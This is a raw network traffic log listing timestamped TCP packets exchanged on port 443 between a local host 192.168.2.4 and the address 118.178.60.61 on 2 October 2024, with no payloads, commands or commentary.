Oct 2, 2024 04:28:27.242432117 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.242479086 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.242480040 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.242492914 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.242533922 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.242547989 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.246532917 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.246603966 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.246629953 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.246722937 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.248712063 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.248769999 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.248771906 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.248781919 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.248823881 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.255666971 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.255723953 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.255726099 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.255738020 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.255770922 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.255791903 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.258328915 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.258374929 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.258394003 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.258403063 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.258430004 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.258447886 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.263067007 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.263118982 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.263122082 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.263130903 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.263163090 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.263179064 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.267539978 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.267596960 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.267702103 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.267770052 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.270734072 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.270790100 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.270803928 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.270895958 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.275321007 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.275398016 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.275558949 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.275613070 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.279995918 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.280049086 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.280050993 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.280061007 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.280095100 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.284987926 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.285037041 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.285053015 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.285106897 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.290704966 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.290780067 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.290800095 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.290855885 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.304440022 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.304498911 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.304639101 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.304688931 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.313107967 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.313177109 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.313194036 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.313205957 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.313226938 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.313249111 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.317884922 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.317959070 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.318098068 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.318176031 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.322834015 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.322891951 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.322891951 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.322906971 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.322932005 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.322947979 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.327495098 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.327548027 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.327552080 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.327560902 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.327589989 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.327605009 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.332413912 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.332479000 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.332644939 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.332700968 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.335545063 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.335611105 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.336031914 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.336082935 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.342407942 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.342457056 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.342475891 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.342494965 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.342508078 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.342534065 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.344985962 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.345041037 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.345053911 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.345098019 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.349885941 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.349960089 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.350141048 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.350191116 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.354516029 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.354578018 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.354758978 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.354832888 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.357647896 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.357690096 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.357697010 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.357711077 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.357758045 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.357777119 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.362432003 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.362492085 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.362528086 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.362586975 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.367252111 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.367309093 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.367455006 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.367516041 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.371906042 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.371963024 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.372354031 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.372514009 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.377671957 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.377731085 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.377749920 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.377758980 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.377773046 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.377799034 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.391407967 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.391458035 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.391475916 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.391490936 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.391521931 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.391546965 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.400055885 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.400098085 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.400114059 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.400126934 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.400156021 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.400177956 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.404844046 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.404882908 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.404891968 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.404897928 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.404927969 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.404942989 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.409740925 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.409801006 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.409801960 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.409815073 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.409848928 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.409873962 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.414767981 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.414829016 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.414844990 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.414889097 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.419306040 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.419356108 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.419574022 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.419624090 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.422442913 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.422487020 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.422700882 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.422744989 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.429234028 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.429286003 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.429294109 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.429307938 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.429343939 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.429363966 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.431932926 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.431976080 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.431987047 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.431998014 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.432025909 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.432044983 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.436930895 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.436985970 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.436995983 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.437007904 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.437035084 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.437052011 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.441385984 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.441442966 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.441469908 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.441523075 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.444700003 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.444763899 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.444926023 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.445005894 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.449294090 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.449350119 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.449353933 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.449361086 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.449392080 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.449413061 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.454152107 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.454212904 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.454366922 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.454417944 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.458796978 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.458858013 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.459326982 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.459392071 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.464699030 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.464757919 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.478374004 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.478420973 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.478425026 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.478432894 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.478458881 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.478471994 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.486979008 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.487035990 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.487057924 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.487077951 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.487106085 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.487123966 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.490870953 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.491621017 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.491676092 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.491733074 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.491791964 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.496543884 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.496620893 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.496685028 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.496732950 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.502080917 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.502125978 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.502325058 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.502374887 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.506170988 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.506226063 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.506316900 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.506359100 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.509303093 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.509360075 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.509402037 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.509454012 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.515970945 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.516014099 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.516113043 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.516165018 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.518852949 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.518913984 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.519253016 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.519295931 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.523643017 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.523695946 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.523758888 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.523809910 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.528408051 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.528450966 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.528568983 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.528614998 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.531595945 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.531641960 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.531677961 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.531712055 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.535912991 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.535964012 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.536206007 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.536259890 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.541052103 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.541096926 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.541153908 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.541198015 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.545883894 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.545928001 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.545941114 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.546080112 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.546122074 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.551433086 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.551460028 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.551491976 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.551683903 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.551747084 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.565170050 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.565229893 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.565376043 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.565428019 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.573708057 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.573759079 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.573936939 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.573976994 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.578639984 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.578681946 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.578696966 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.578741074 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.583416939 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.583458900 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.583616018 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.583668947 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.589004040 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.589044094 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.589178085 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.589220047 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.593303919 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.593353987 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.593468904 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.593509912 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.597143888 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.597193956 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.597198963 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.597210884 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.597239971 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.597275019 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.604510069 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.604590893 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.604635000 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.604681015 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.610305071 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.610343933 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.610362053 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.610428095 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.612298965 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.612335920 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.612337112 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.612350941 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.612377882 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.612397909 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.615237951 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.615293980 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.615345001 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.615410089 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.618446112 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.618490934 CEST	49748	443	192.168.2.4	118.178.60.61
